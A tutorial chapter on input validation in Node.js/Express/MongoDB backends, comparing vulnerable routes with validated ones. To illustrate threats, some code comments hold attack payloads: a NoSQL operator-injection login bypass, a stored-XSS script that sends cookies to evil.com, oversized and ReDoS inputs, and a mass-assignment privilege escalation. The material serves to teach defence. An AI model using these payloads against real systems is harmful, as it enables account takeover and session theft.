Episode 3 — NodeJS MongoDB Backend Architecture / 3.10 — Input Validation

3.10.a — Why Validation Matters

Input validation is the practice of checking data against expected formats, types, and constraints before processing it. It protects data integrity, closes off common attack vectors such as injection, XSS, and denial of service, and improves user experience by returning clear, early error messages.




1. What Is Input Validation?

Validation is the process of verifying that incoming data meets your application's expectations before it enters your business logic or database.

User Input --> [VALIDATION LAYER] --> Business Logic --> Database
                   |
                   v
              Reject bad data
              with clear errors

Every piece of data that crosses a trust boundary must be validated:

  • HTTP request bodies (POST/PUT data)
  • URL parameters (/users/:id)
  • Query strings (?page=1&limit=10)
  • HTTP headers (authorization tokens, content types)
  • File uploads (type, size, name)
  • Data from external APIs or services
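URL parameters and query strings need the same scrutiny as request bodies. They always start out as strings, and some query parsers also produce arrays or nested objects. The plain-JavaScript sketch below uses two hypothetical helpers, `isObjectIdString` and `parsePagination` (not part of Express or Mongoose), with arbitrary defaults of page 1, limit 10, and a maximum limit of 100.

```javascript
// Hypothetical helpers for two trust boundaries: URL params and query strings.

// A MongoDB ObjectId in its usual string form is exactly 24 hex characters.
function isObjectIdString(value) {
  return typeof value === 'string' && /^[0-9a-fA-F]{24}$/.test(value);
}

// Parse ?page=&limit= strictly. Arrays, objects, and non-digit strings are errors;
// out-of-range numbers are reported rather than silently clamped.
function parsePagination(query, { maxLimit = 100 } = {}) {
  const errors = [];
  const result = { page: 1, limit: 10 }; // defaults when a param is absent

  for (const key of ['page', 'limit']) {
    const raw = query[key];
    if (raw === undefined) continue;
    if (typeof raw !== 'string' || !/^\d+$/.test(raw)) {
      errors.push(`${key} must be a positive integer`);
      continue;
    }
    result[key] = Number(raw);
  }

  if (result.page < 1) errors.push('page must be at least 1');
  if (result.limit < 1 || result.limit > maxLimit) {
    errors.push(`limit must be between 1 and ${maxLimit}`);
  }
  return errors.length > 0 ? { errors } : { value: result };
}
```

For example, `parsePagination({ page: '2', limit: '20' })` returns `{ value: { page: 2, limit: 20 } }`, while `parsePagination({ limit: '5000' })` returns an error instead of silently clamping. Rejecting rather than clamping is a design choice, not a rule.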

2. Data Integrity

Without validation, your database fills with inconsistent, malformed data that breaks downstream systems.

What Goes Wrong

// No validation — anything goes into the database
app.post('/users', async (req, res) => {
  const user = await User.create(req.body);
  res.json(user);
});

// This route accepts all of these, and unless the User schema happens to reject them, they are saved. They should NOT be:
// { email: "not-an-email", age: -5, name: "" }
// { email: 123, age: "old", name: null }
// { unexpectedField: "malicious data" }
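To make the failure concrete, here is a hand-rolled check in plain JavaScript that rejects all three payloads above. The function name `validateNewUser`, the allowed-field list, and the rules (non-empty name, a deliberately simple email pattern, integer age from 0 to 150) are illustrative assumptions; in practice a library such as express-validator does this work.

```javascript
// Hypothetical validator for the POST /users payload shown above.
const ALLOWED_FIELDS = ['name', 'email', 'age'];
const EMAIL_PATTERN = /^[^\s@]+@[^\s@]+\.[^\s@]+$/; // deliberately simple

function validateNewUser(body) {
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    return ['body must be a JSON object'];
  }
  const errors = [];

  // Reject fields the application does not know about instead of storing them.
  for (const key of Object.keys(body)) {
    if (!ALLOWED_FIELDS.includes(key)) errors.push(`unexpected field: ${key}`);
  }

  if (typeof body.name !== 'string' || body.name.trim() === '') {
    errors.push('name must be a non-empty string');
  }
  if (typeof body.email !== 'string' || !EMAIL_PATTERN.test(body.email)) {
    errors.push('email must be a valid email address');
  }
  if (!Number.isInteger(body.age) || body.age < 0 || body.age > 150) {
    errors.push('age must be an integer between 0 and 150');
  }
  return errors; // an empty array means the payload passed
}
```

Each of the three payloads produces at least one error, so a route using this check would respond with 400 instead of calling `User.create`.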

Real Consequences

| Problem                 | Example                                 | Impact                                    |
|-------------------------|-----------------------------------------|-------------------------------------------|
| Wrong type              | age: "twenty" instead of age: 20        | Calculations break, sorting fails         |
| Missing required fields | No email on a user record               | Cannot send notifications, login fails    |
| Out-of-range values     | quantity: -50 on an order               | Inventory goes negative, financial errors |
| Malformed references    | userId: "abc" instead of valid ObjectId | Broken joins, orphaned records            |
| Duplicate entries       | Two accounts with same email            | Auth confusion, data leaks                |
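The duplicate-entries row needs the database's help: a per-request format check cannot know whether an email is already taken, and a "look up, then insert" check can race with a concurrent request. A common approach is a unique index in MongoDB plus translating the duplicate-key error (MongoDB error code 11000) into a client-facing response. The sketch below assumes the error object exposes `code` and, when the driver provides it, `keyValue`; the helper name `toHttpError` is hypothetical.

```javascript
// Hypothetical helper: map a MongoDB duplicate-key error to an HTTP response shape.
// MongoDB reports unique-index violations with error code 11000.
function toHttpError(err) {
  if (err && err.code === 11000) {
    // keyValue (when present) names the conflicting field(s), e.g. { email: '...' }.
    const fields = err.keyValue ? Object.keys(err.keyValue) : [];
    return { status: 409, body: { error: 'Duplicate value', fields } };
  }
  // Anything else is unexpected: do not leak internal details to the client.
  return { status: 500, body: { error: 'Internal server error' } };
}
```

In an Express error handler this could be used as `const { status, body } = toHttpError(err); res.status(status).json(body);`.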

3. Security Threats Without Validation

3.1 SQL/NoSQL Injection

// Without validation: MongoDB (NoSQL) injection
app.post('/login', async (req, res) => {
  const { username, password } = req.body;

  // Attacker sends JSON: { "username": { "$gt": "" }, "password": { "$gt": "" } }
  // express.json() parses these into objects, and { $gt: "" } matches any non-empty string,
  // so the filter matches every user whose username and password are set
  const user = await User.findOne({ username, password });
  // findOne returns the first match: the attacker is now logged in as that user
});

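// With validation: injection blocked
const { body, validationResult } = require('express-validator');
const bcrypt = require('bcrypt');

app.post('/login',
  body('username').isString().trim().isLength({ min: 3, max: 30 }),
  body('password').isString().isLength({ min: 8 }),
  async (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });

    // username and password are guaranteed to be strings now
    const user = await User.findOne({ username: req.body.username });

    // user.password holds a bcrypt hash; an unknown user and a wrong password get the same response
    const isMatch = user ? await bcrypt.compare(req.body.password, user.password) : false;
    if (!isMatch) return res.status(401).json({ error: 'Invalid credentials' });

    res.json({ message: 'Logged in' });
  }
);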
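The validated route works because `isString()` rejects objects such as `{ "$gt": "" }`. For endpoints that legitimately accept nested objects, a complementary guard is to reject any key that MongoDB could interpret as an operator or a dotted path. The recursive helper below is a hypothetical plain-JavaScript sketch of that idea (the express-mongo-sanitize package takes a similar approach by stripping such keys); it complements type checks rather than replacing them.

```javascript
// Hypothetical guard: does any key in this value start with "$" or contain "."?
// Such keys can be interpreted by MongoDB as query operators or nested paths.
function containsOperatorKeys(value) {
  if (Array.isArray(value)) {
    return value.some((item) => containsOperatorKeys(item));
  }
  if (value !== null && typeof value === 'object') {
    return Object.entries(value).some(
      ([key, nested]) =>
        key.startsWith('$') || key.includes('.') || containsOperatorKeys(nested)
    );
  }
  return false; // strings, numbers, booleans, and null cannot carry operators
}
```

A route would call it on `req.body` and respond with 400 whenever it returns `true`.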

3.2 Cross-Site Scripting (XSS)

// Without validation — stored XSS
app.post('/comments', async (req, res) => {
  // Attacker sends: { text: "<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>" }
  const comment = await Comment.create({ text: req.body.text });
  // When other users view this comment, the script executes in their browser
});

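// With sanitization: XSS blocked
const { body, validationResult } = require('express-validator');

app.post('/comments',
  body('text').isString().trim().escape().isLength({ min: 1, max: 5000 }),
  async (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });

    // .escape() converts & < > " ' (and also / \ `) to HTML entities
    // "<script>" is stored as "&lt;script&gt;" and renders as text, not code
    const comment = await Comment.create({ text: req.body.text });
    res.status(201).json(comment);
  }
);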
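Escaping is plain string replacement. The hypothetical `escapeHtml` below covers the five characters that matter most in HTML text and attribute values; express-validator's `escape()` (which uses validator.js) additionally encodes `/`, `\` and the backtick, so the outputs differ slightly. A common alternative is to store the raw text and escape it when rendering HTML; what matters is that it is encoded before a browser interprets it.

```javascript
// Hypothetical HTML escaper for the characters that can open tags or break out of attributes.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(text) {
  // A single-pass replace handles each character once,
  // so entities it produces are never escaped a second time.
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}
```

`escapeHtml('<script>')` returns `'&lt;script&gt;'`, matching the comment in the route above.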

3.3 Denial of Service (DoS)

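// Without validation: DoS via payload size and regex abuse
app.post('/search', async (req, res) => {
  // Attacker sends: { query: "a".repeat(10_000_000) }
  // Or: { items: Array(1_000_000).fill("data") }
  // If the body limit has been raised (express.json() defaults to 100kb), the server
  // spends memory and CPU on this; req.body.query is also compiled as a regex, so
  // input such as "(a+)+$" can trigger catastrophic backtracking
  const results = await Product.find({ name: new RegExp(req.body.query) });
});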

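// With validation: payload constrained
const { body, validationResult } = require('express-validator');
app.use(express.json({ limit: '10kb' })); // bodies over 10kb are rejected with 413 before any route runs
app.post('/search',
  body('query').isString().isLength({ min: 1, max: 200 }),
  body('items').optional().isArray({ max: 100 }),
  async (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
    // query is now a short string; still escape regex metacharacters before new RegExp()
  }
);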
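Length limits bound the input, but passing user text straight to `new RegExp()` has a second problem: characters such as `.`, `*` and `(` become regex syntax, which changes the meaning of the search and can enable pathological patterns (ReDoS). A common fix is to escape regex metacharacters so the text is matched literally. The helper name `buildSearchRegex` and the 200-character limit are assumptions that mirror the route above.

```javascript
// Hypothetical helper: turn untrusted search text into a literal, case-insensitive RegExp.
const MAX_QUERY_LENGTH = 200;

function escapeRegex(text) {
  // Prefix every regex metacharacter with a backslash so it matches literally.
  return text.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

function buildSearchRegex(query) {
  if (typeof query !== 'string' || query.length === 0 || query.length > MAX_QUERY_LENGTH) {
    return null; // caller should respond with 400
  }
  return new RegExp(escapeRegex(query), 'i');
}
```

After checking for `null`, the route could run `Product.find({ name: buildSearchRegex(req.body.query) })`, which searches for the literal text the user typed.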

4. Server-Side vs Client-Side Validation

                  CLIENT-SIDE                          SERVER-SIDE
            ┌─────────────────────┐            ┌─────────────────────────┐
            │  Quick feedback     │            │  Security enforcement   │
            │  Reduces requests   │            │  Data integrity         │
            │  Better UX          │            │  Cannot be bypassed     │
            │  CAN be bypassed    │            │  Canonical source       │
            └─────────────────────┘            └─────────────────────────┘
                     │                                    │
                     └──────────── BOTH ARE NEEDED ───────┘
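
| Aspect           | Client-Side                   | Server-Side          |
|------------------|-------------------------------|----------------------|
| Purpose          | UX improvement                | Security enforcement |
| Can be bypassed? | Yes (DevTools, curl, Postman) | No                   |
| Feedback speed   | Instant                       | Requires round-trip  |
| Where it runs    | Browser (JavaScript)          | Server (Node.js)     |
| Required?        | Nice to have                  | Absolutely mandatory |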

Why Client-Side Alone Is Never Enough

# Anyone can bypass client-side validation with curl:
curl -X POST http://localhost:3000/api/users \
  -H "Content-Type: application/json" \
  -d '{"email": "not-valid", "age": -999, "role": "admin"}'

# Or with browser DevTools:
# 1. Open Network tab
# 2. Edit and resend any request
# 3. All client-side validation is bypassed

5. Defense in Depth

Validate at every boundary, not just one layer:

┌──────────────────────────────────────────────────────────┐
│  Layer 1: Client-Side Validation (HTML5 + JavaScript)    │
│  ┌────────────────────────────────────────────────────┐  │
│  │  Layer 2: API Gateway / Rate Limiting              │  │
│  │  ┌──────────────────────────────────────────────┐  │  │
│  │  │  Layer 3: Express Middleware Validation      │  │  │
│  │  │  ┌────────────────────────────────────────┐  │  │  │
│  │  │  │  Layer 4: Mongoose Schema Validation   │  │  │  │
│  │  │  │  ┌──────────────────────────────────┐  │  │  │  │
│  │  │  │  │  Layer 5: MongoDB Schema Rules   │  │  │  │  │
│  │  │  │  └──────────────────────────────────┘  │  │  │  │
│  │  │  └────────────────────────────────────────┘  │  │  │
│  │  └──────────────────────────────────────────────┘  │  │
│  └────────────────────────────────────────────────────┘  │
└──────────────────────────────────────────────────────────┘
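
const { body } = require('express-validator');
const mongoose = require('mongoose');

// Layer 3: Express middleware validation
const validateRegistration = [
  body('email').isEmail().normalizeEmail(),
  body('password').isStrongPassword(), // defaults: 8+ chars with a lowercase, uppercase, number, and symbol
  body('age').isInt({ min: 13, max: 120 }),
];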

// Layer 4: Mongoose schema validation
const userSchema = new mongoose.Schema({
  email: {
    type: String,
    required: [true, 'Email is required'],
    match: [/^\S+@\S+\.\S+$/, 'Invalid email format'],
    unique: true, // builds a unique index; NOT a validator (duplicates fail with MongoDB error 11000)
    lowercase: true,
    trim: true,
  },
  password: {
    type: String,
    required: [true, 'Password is required'],
    minlength: [8, 'Password must be at least 8 characters'],
  },
  age: {
    type: Number,
    min: [13, 'Must be at least 13 years old'],
    max: [120, 'Invalid age'],
  },
});
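Layer 5 in the diagram refers to rules enforced by MongoDB itself, independent of Mongoose, through a `$jsonSchema` validator on the collection. The sketch below assumes the official `mongodb` Node.js driver, where `db.createCollection(name, options)` accepts `validator`, `validationLevel`, and `validationAction`. The rules mirror the Mongoose schema above, and the function name `createUsersCollection` is hypothetical.

```javascript
// Layer 5 sketch: a MongoDB $jsonSchema validator enforced by the database server.
// Assumes the official `mongodb` driver; `db` is a connected Db instance.
const userValidator = {
  $jsonSchema: {
    bsonType: 'object',
    required: ['email', 'password'],
    properties: {
      email: {
        bsonType: 'string',
        pattern: '^\\S+@\\S+\\.\\S+$',
        description: 'must be a string shaped like an email address',
      },
      password: {
        bsonType: 'string',
        minLength: 8,
        description: 'stored password hash, at least 8 characters',
      },
      age: {
        bsonType: ['int', 'long', 'double', 'decimal'],
        minimum: 13,
        maximum: 120,
        description: 'optional; between 13 and 120 when present',
      },
    },
  },
};

// Hypothetical setup function: create the collection with the validator attached.
async function createUsersCollection(db) {
  return db.createCollection('users', {
    validator: userValidator,
    validationLevel: 'strict', // check all inserts and updates
    validationAction: 'error', // reject violating writes instead of only logging them
  });
}
```

Writes that violate the schema then fail with a document validation error even when they come from outside the Node.js app, for example from the mongo shell or another service.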

6. Validation vs Sanitization

These are related but distinct operations:

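| Concept      | Purpose                                     | Example                                       |
|--------------|---------------------------------------------|-----------------------------------------------|
| Validation   | Check if data meets rules; accept or reject | Is "hello@email.com" a valid email?           |
| Sanitization | Transform data to be safe/clean             | Trim whitespace, escape HTML, normalize email |
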
const { body, validationResult } = require('express-validator');

app.post('/profile',
  // VALIDATION: reject if rules not met
  body('email').isEmail(),                      // Must be valid email
  body('age').isInt({ min: 0, max: 150 }),      // Must be integer 0-150
  body('website').optional().isURL(),           // If present, must be URL

  // SANITIZATION: transform the data
  body('email').normalizeEmail(),               // "John@GMAIL.COM" -> "john@gmail.com"
  body('name').trim().escape(),                 // "  <b>John</b>  " -> "&lt;b&gt;John&lt;&#x2F;b&gt;"
  body('age').toInt(),                          // "25" -> 25

  (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
    res.json(req.body);                         // contains the sanitized values
  }
);
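The same split can be shown without a library: validation functions return a verdict and leave the input untouched, while sanitizers return a new, cleaned value. The function names and rules below are hypothetical, and email normalization is reduced to trimming and lowercasing (express-validator's `normalizeEmail()` does more, such as provider-specific rules).

```javascript
// Hypothetical profile pipeline: validate first, sanitize only data that passed.
const EMAIL_PATTERN = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;

// VALIDATION: returns a list of problems and never modifies the input.
function validateProfile(input) {
  const errors = [];
  if (typeof input.email !== 'string' || !EMAIL_PATTERN.test(input.email.trim())) {
    errors.push('email is invalid');
  }
  if (!/^\d+$/.test(String(input.age)) || Number(input.age) > 150) {
    errors.push('age must be an integer from 0 to 150');
  }
  return errors;
}

// SANITIZATION: returns a new object with normalized values.
function sanitizeProfile(input) {
  return {
    email: input.email.trim().toLowerCase(),
    name: typeof input.name === 'string' ? input.name.trim() : '',
    age: Number(input.age),
  };
}

function processProfile(input) {
  const errors = validateProfile(input);
  return errors.length > 0 ? { errors } : { value: sanitizeProfile(input) };
}
```

For `{ email: '  John@GMAIL.COM ', name: '  John  ', age: '25' }` the result is `{ value: { email: 'john@gmail.com', name: 'John', age: 25 } }`; invalid input never reaches the sanitizer.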

Order Matters

// WRONG: sanitize before validate — may hide invalid input
body('age').toInt().isInt({ min: 0 });
// "abc" -> NaN -> fails isInt (works here by luck)
// But: "12abc" -> 12 -> passes isInt (BAD — original input was invalid)

// RIGHT: validate first, then sanitize
body('age').isInt({ min: 0 }).toInt();
// "12abc" -> fails isInt immediately (GOOD)
// "12" -> passes isInt -> converted to number 12
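The `"12abc"` case comes from how lenient string-to-integer conversion works: `parseInt` reads leading digits and stops at the first non-digit, so it turns invalid input into a valid-looking number. The plain-JavaScript comparison below illustrates this; `isIntegerString` is a hypothetical stand-in for an `isInt()`-style validator, not its actual implementation.

```javascript
// Why order matters: lenient conversion can turn invalid input into valid-looking data.

// Hypothetical strict check standing in for an isInt-style validator:
// an optional sign followed by digits, and nothing else.
function isIntegerString(value) {
  return /^[+-]?\d+$/.test(String(value));
}

function compareOrders(raw) {
  const converted = parseInt(raw, 10); // reads leading digits: "12abc" -> 12, "abc" -> NaN
  return {
    converted,
    sanitizeFirst: isIntegerString(converted), // validates the converted value
    validateFirst: isIntegerString(raw), // validates what the client actually sent
  };
}

for (const raw of ['12', '12abc', 'abc']) {
  console.log(JSON.stringify(raw), compareOrders(raw));
}
```

For `'12abc'` the sanitize-first path reports a valid integer while the validate-first path rejects it, which is exactly the ordering bug described above.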

7. Real-World Validation Failures

Case 1: Mass Assignment Vulnerability

// Dangerous: accepting entire req.body
app.put('/users/:id', async (req, res) => {
  await User.findByIdAndUpdate(req.params.id, req.body);
  // Attacker sends: { role: "admin", verified: true }
  // They just elevated their own privileges
});

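// Safe: validate and whitelist fields
const { body, param, validationResult, matchedData } = require('express-validator');

app.put('/users/:id',
  param('id').isMongoId(),
  body('name').optional().isString().trim().isLength({ max: 100 }),
  body('bio').optional().isString().trim().isLength({ max: 500 }),
  async (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });

    // matchedData keeps only validated body fields that were sent; role and verified are dropped
    const updates = matchedData(req, { locations: ['body'] });
    const user = await User.findByIdAndUpdate(req.params.id, updates, { new: true });
    res.json(user);
  }
);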
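The whitelist idea does not depend on express-validator. The hypothetical `pickAllowed` helper below copies only permitted keys that were actually sent, which also avoids writing `undefined` values into an update when the client omits a field. The allowed-field list is an assumption matching the route above.

```javascript
// Hypothetical whitelist helper for update payloads.
const UPDATABLE_FIELDS = ['name', 'bio'];

function pickAllowed(source, allowed = UPDATABLE_FIELDS) {
  const result = {};
  for (const key of allowed) {
    // Copy only own properties that were actually sent with a defined value.
    if (Object.prototype.hasOwnProperty.call(source, key) && source[key] !== undefined) {
      result[key] = source[key];
    }
  }
  return result;
}
```

`pickAllowed({ name: 'Ann', role: 'admin', verified: true })` returns `{ name: 'Ann' }`, so the privilege-escalation payload has no effect.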

Case 2: Type Coercion Bugs

// JavaScript type coercion creates unexpected behavior
"5" > "12"   // true (string comparison: "5" > "1")
"5" > 12     // false (number comparison: 5 > 12)

// Without validation, query parameters arrive as strings (or arrays/objects, depending on the query parser)
app.get('/products', async (req, res) => {
  // req.query.minPrice is "5" (string), not 5 (number)
  // The native driver compares by BSON type, so { $gte: "5" } never matches numeric prices;
  // Mongoose casts "5" to 5 from the schema, but a value like "abc" throws a CastError
  const products = await Product.find({ price: { $gte: req.query.minPrice } });
});
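A safer pattern is to convert query parameters to numbers explicitly and reject anything that is not a plain numeric string, including the arrays a query-string parser produces for `?minPrice=1&minPrice=2`. `parseMinPrice` is a hypothetical helper; express-validator's `query('minPrice').isFloat({ min: 0 }).toFloat()` expresses a similar rule declaratively.

```javascript
// Hypothetical helper: parse ?minPrice=... into a non-negative number.
// Returns null when the parameter is absent or invalid; the caller decides what null means.
function parseMinPrice(raw) {
  // Arrays (?minPrice=1&minPrice=2) and objects (nested query syntax) are rejected outright.
  if (typeof raw !== 'string') return null;
  // Digits with an optional decimal part: no sign, exponent, or whitespace.
  if (!/^\d+(\.\d+)?$/.test(raw)) return null;
  return Number(raw);
}

// The same coercion pitfall with sorting: strings sort character by character.
const asStrings = ['5', '12', '100'].sort(); // ['100', '12', '5']
const asNumbers = ['5', '12', '100'].map(Number).sort((a, b) => a - b); // [5, 12, 100]
```

The route would then call `parseMinPrice(req.query.minPrice)`, respond with 400 on `null`, and pass a real number to `$gte`.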

Key Takeaways

  1. Never trust user input — validate everything that crosses a trust boundary
  2. Server-side validation is mandatory — client-side validation is only for UX
  3. Validate AND sanitize — validation rejects bad data, sanitization cleans good data
  4. Defense in depth — validate at every layer (middleware, schema, database)
  5. Whitelist fields — never pass raw req.body to database operations
  6. Security threats — injection, XSS, and DoS attacks all exploit missing validation

Explain-It Challenge

Imagine you are building a public API for a banking application. A junior developer suggests that since the mobile app validates all inputs before sending requests, server-side validation is unnecessary. Explain in detail why this reasoning is flawed, what specific attacks could exploit this gap, and design a multi-layer validation strategy for a money transfer endpoint (POST /transfer with recipientId, amount, and note fields).